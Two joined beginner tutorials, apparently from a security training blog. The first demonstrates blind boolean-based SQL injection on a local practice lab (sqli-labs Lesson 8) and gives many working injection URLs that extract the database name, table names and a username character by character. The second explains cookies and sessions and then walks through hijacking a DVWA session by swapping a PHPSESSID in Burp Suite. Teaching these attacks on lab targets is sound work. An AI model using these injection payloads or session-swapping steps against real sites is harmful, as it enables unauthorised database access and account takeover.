Beginner Guide to SQL Injection Boolean Based (Part 2)

Their so many ways to hack the database using SQL injection as we had seen in our previous tutorial Error based attack, login formed based attack and many more different type of attack in order to retrieve information from inside database. In same way today we will learn a new type of SQL injection attack known as Blind Boolean based attack.

An attacker always check SQL injection vulnerability using comma (‘) inside URL  to break the statement in order to receive sql error message. It is a fight between developer and attacker, the developer increases the security level and attacker try to break it. This time developer had blocked error message as the output on the website. Hence if database is vulnerable to SQL injection then attacker do not obtain any error message on website.Attacker will try to confirm if the database is vulnerable to Blind SQL Injection by evaluating the results of various queries which return either TRUE or FLASE.

Let’s start!!

Using Dhakkan we will demonstrate blind SQL injection.

Lesson 8

Lesson 8 is regarding blind boolean based injection therefore first we need to explore http://localhost:81/sqli/Less-8/?id=1 on browser, this will send the query into database.

SELECT * from table_name WHERE id=1

As output it will display “you are in” the yellow color text on the web page as shown in given image.

When attacker tries to break this query using comma (‘) http://localhost:81/sqli/Less-8/?id=1’

 Or other different technique he will not able to found any error message. More over yellow color text will disappear if attack tries to inject invalid query which also shown in given image.

Then attacker will go for blind sql injection to make sure, that inject query must return an answer either true or false.

http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+

SELECT * from table_name WHERE id=1’ AND 1=1

Now database test for given condition whether 1 is equal to 1 if query is valid it returns TRUE, from screenshot you can see we have got yellow color text again “you are in”, which means our query is valid.

In next query which check for URL

http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+

SELECT * from table_name WHERE id=1’ AND 1=0

Now it will test the given condition whether 1 is equal to 0 as we know 1 is not equal to 0 hence database answer as ‘FLASE’ query. From screenshot it confirms when yellow color text get disappear again.

Hence it confirms that the web application is infected to blind sql injection. Using true and false condition we are going to retrieve database information.

Length of database string

Following query will ask the length of database string. For example the name of database is IGNITE which contains 6 alphabets so length of string for database IGNITE is equal to 6.

Similarly we will inject given below query which will ask whether length of database string is equal to 1, in response of that query it will answer by returning TRUE or FALSE through text “you are in”.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1--+

From given screenshot you can see again the text gets disappear which means it has return FALSE to reply NO the length of database string is not equal to 1

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 2--+

Again it will test the length of database string is equal to 2; it has return FALSE to reply NO the length of database string is not equal to 2. Repeat the same step till we do not receive TRUE for string length 3/4/5/ and so on.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 8--+

when I test for string is equal to 8; it answer as true and as result yellow color text “you are in” appears again.

As we know computer does not understand human language it can read only binary language therefore we will use ASCII code. The ASCII code associates an integer value for all symbols in the character set, such as letters, digits, punctuation marks, special characters, and control characters.

For example look at following string ascii code:

1 = I = 73

2 = G = 71

3 = N = 78

4 = I = 73

5 = T = 84

6 = E = 69

Further we will enumerate database name using ascii character for all 8 strings.

Next query will ask from database test the condition whether first string of database name is greater than 100 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 100--+

It reflects TRUE condition hence if you match the ascii character you will observe that from 100 small alphabets string has been running till 172.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 120--+

Similarly it will test again whether first letter is greater than 120. But this time it return FALSE which means the first letter is greater than 100 and less than 120.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 101--+

Now next it will equate first string from 101, again we got FLASE.

We  had perform this test from 101 till 114 but receive FLASE every time.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 114--+

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115--+

Finally receive TRUE reply at 115 which means first string is equal to 115, where 115 =‘s’

Similarly test for second string, repeat above step by replacing first string from second.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) > 100--+

I received TRUE reply at 101 which means second string is equal to 101 and 101 = ‘e’.

Similarly I had performed this for all eight strings and got following result:

1 = s = 115

2 = e = 101

3 = c =99

4 = u =117

5 = r =114

6 = i = 105

7 = t = 116

8 = y = 121

Table string length

We have to use same technique for enumerating information of the table from inside the database. Given query will test the condition whether the length of string for first table is greater than 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

Given query will test the condition whether the length of string for first table is greater than 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 6 --+

In reply we receive FALSE and text “you are in” disappears again from the web site.

Given query will test the condition whether the length of string for first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

Similarly I test for second and third table using same technique by replacing only table number in same query.

Similarly enumerating fourth table information using following query to test the condition whether the length of string for fourth table is equal to 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

In reply we receive TRUE and text “you are in” appears again on the web site.

As we had performed in database enumeration using ascii code similarly we are going to use same technique to retrieve table name.

Further we will enumerate 4^th table name using ascii character for all 5 strings.

Next query will ask from database to test the condition whether first string of table name is greater than 115 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 115 --+

It reflects TRUE condition text “you are in” appears again on the web site hence if you match the ascii character.

Next query will ask from database to test the condition whether first string of table name is greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 120 --+

But this time it return FALSE which means the first letter is greater than 115 and less than 120.

Proceeding towards equating the string from ascii code between number 115 to 120. Next query will ask from database to test the condition whether first string of table name is greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 116 --+

It return FALSE, text get disappear.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

It returns TRUE, text get appear.

Similarly we had test remaining strings and received following result

1 = u = 117

2 = s = 115

3 = e = 101

4 = r = 114

5 = s = 115

User Name Enumeration

Using same method we are going to enumerate length of string username from inside the table users

Given below query will test for string length is equal to 4 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select username from users limit 0,1))) = 4 --+

It reply TRUE with help of yellow color text

Using same method we are going to enumerate username from inside the table users

Given below query will test for first string using ascii code.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+

We received FALSE which means the first string must be less than 100.

 http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 50 --+

 We received TRUE which means the first string must be more than 50.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 60 --+

We received TRUE which means the first string must be more than 60.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 70 --+

 We received FALSE which means the first string is less than 70.

Hence first string must lie between 60 and 70 of ascii code.

Proceeding towards comparing string from different ascii code using following query.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

This time successfully receive TRUE with appearing text “you are in”.

Similarly I had test for all four string in order to retrieve username:

1 = D = 68

2 = u = 117

3 = m = 109

4 = b = 98

Hence today we had learned how attacker hacked database using blind sql injection.

!!Try yourself to retrieve password for user dumb!!

Beginner Guide to Understand Cookies and Session Management

Cookie is a small piece of data sent by a server to a browser and stored on the user's computer while the user is browsing. Cookies are produced and shared between the browser and the server using the HTTP Header.

It Allows server store and retrieve data from the client, It Stored in a file on the client side and maximum size of cookie that can stored is limited upto 4K in any web browser. Cookies have short time period because they have expiry date and time as soon as browser closed.

Example- when you visit YouTube and search for Bollywood songs, this gets noted in your browsing history, the next time you open YouTube on your browser, the cookies reads your browsing history and you will be shown Bollywood songs on your YouTube homepage

Creating cookie

The setcookie() function is used for the cookie to be sent along with the rest of the HTTP headers.

When developer creates a cookie, with the function setcookie, he must specify atleast three arguments. These arguments are setcookie(name, value, expiration);

Cookie Attributes

1.      Name: Specifies the name of the cookie

2.      Value: Specifies the value of the cookie

3.      Secure: Specifies whether or not the cookie should only be transmitted over a secure HTTPS connection. TRUE indicates that the cookie will only be set if a secure connection exists. Default is FALSE

4.      Domain: Specifies the domain name of the cookie. To make the cookie available on all subdomains of example.com, set domain to "example.com". Setting it to www.example.com will make the cookie only available in the www subdomain

5.      Path: Specifies the server path of the cookie. If set to "/", the cookie will be available within the entire domain. If set to "/php/", the cookie will only be available within the php directory and all sub-directories of php. The default value is the current directory that the cookie is being set in

6.      HTTPOnly: If set to TRUE the cookie will be accessible only through the HTTP protocol (the cookie will not be accessible by scripting languages). This setting can help to reduce identity theft through XSS attacks. Default is FALSE

7.      Expires: Specifies when the cookie expires. The value: time ()+86400*30, will set the cookie to expire in 30 days. If this parameter is omitted or set to 0, the cookie will expire at the end of the session (when the browser closes). Default is 0

Necessity of Cookies

Cookies can be used for various purposes –

§  Identifying Unique Visitors.

§  Http is a stateless protocol; cookies permit us to track the state of the application using small files stored on the user’s computer.

§  Recording the time each user spends on a website.

Type of cookies

Session Cookie

This type of cookies dies when the browser is closed because they are stored in browser’s memory. They’re used for e-commerce websites so user can continue browsing without losing what he put in his cart. If the user visits the website again after closing the browser these cookies will not be available. It is safer, because no developer other than the browser can access them.

Persistent Cookie

These cookies do not depend on the browser session because they are stored in a file of browser computer. If the user closes the browser and then access the website again then these cookies will still be available. The lifetime of these cookies are specified in cookies itself (as expiration time). They are less secure.

Third Party Cookie

A cookie set by a domain name that is not the domain name that appears in the browser address bar these cookies are mainly used for tracking user browsing patterns and/or finding the Advertisement recommendations for the user.

Secure Cookie

A secure cookie can only be transmitted over an encrypted connection.  A cookie is made secure by adding the secure flag to the cookie. Browsers which support the secure flag will only send cookies with the secure flag when the request is going to a HTTPS page.

HTTP Only Cookie

It informs the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly prohibited. This is an important security protection for session cookies.

Zombies Cookie

A zombie cookie is an HTTP cookie that is recreated after deletion. Cookies are recreated from backups stored outside the web browser's dedicated cookie storage.

Sessions

PHP session: when any user made any changes in web application like sign in or out, the server does not know who that person on the system is. To shoot this problem PHP session introduce which store user information to be used across several web pages.

Session variables hold information about one single user, and are exist to all pages in one application.

Example: login ID user name and password.

Session ID

PHP code generates a unique identification in the form of hash for that specific session which is a random string of 32 hexadecimal numbers such as 5f7dok65iif989fwrmn88er47gk834 is known as PHPsessionID.

A session ID or token is a unique number which is used to identify a user that has logged into a website. Session ID is stored inside server, it is assigns to a specific user for the duration of that user's visit (session). The session ID can be stored as a cookie, form field, or URL.

Explanation:

Now let’s have a look over this picture and see what this picture says:

In given picture we can clearly see there are three components inside it: HTTP Client, HTTP server and Database (holding session ID).

Step1: client send request to server via POST or GET.

Step2: session Id created on web server. Server save session ID into database and using set-cookie function send session ID to the client browser as response.

Step3: cookie with session ID stored on client browser is send back to server where server matches it from database and sends response as HTTP 200 OK.

Session hijacking

As we know different users have unique session ID when an attacker sniff the session via man-in-middle attack or via XSS and steal session ID or session token this is called session hijacking. When attacker sends the stealing session ID to web server, server match that ID from database stored session ID. If they both matched to each other then the server reply with HTTP 200 OK and attacker get successfully access without submitting proper Identification.

Session hijacking tutorial

For this tutorial I have targeted DVWA, here cookie name is dvwa Session.

Note: session ID for this page will change every time when we will close the browser.

Now capture the browser request using burp suite.

From given image we can see the cookie holds PHPSESSID P38kq30vi6arr0b321p2uv86k0; now send this intercepted data into repeater to observe its response.

In response you can see the highlighted data show set –cookie: dvwaSession =1 more over HTTP 200 OK response from server side.

According to developer each time a new sessionID will generate by server each time, but attacker sniff this session ID P38kq30vi6arr0b321p2uv86k0 for unauthorized login.

Next time we receive another session id when data is intercepted through burp suite i.e. PHPSESSID= gutnu601knp4qsrgfdb4ad0te3, again send this intercepted data into repeater to observe its response.

But before we perceive its response, replace new PHPSESSID from old PHPSESSID.

From given image you can observe we have replaced the SESSION ID and then generate its response in which set –cookie: dvwaSession =6 and HTTP 200 OK response from server side.  

Now change the value inside intercepted data and then forward this request to the server.

Session Vs cookies

Session	Cookies
Data are stored on Server	Data are stored in Client’s Browser
Sessions Data are more secure because they never travel on every HTTPRequest	Travel with each and Every HTTP request
You can store Objects (Store Large Amount of Data)	You can store strings type (Max File Size 4 kb)
Session Cannot be used for Future Reference	Cookies are mostly used for future reference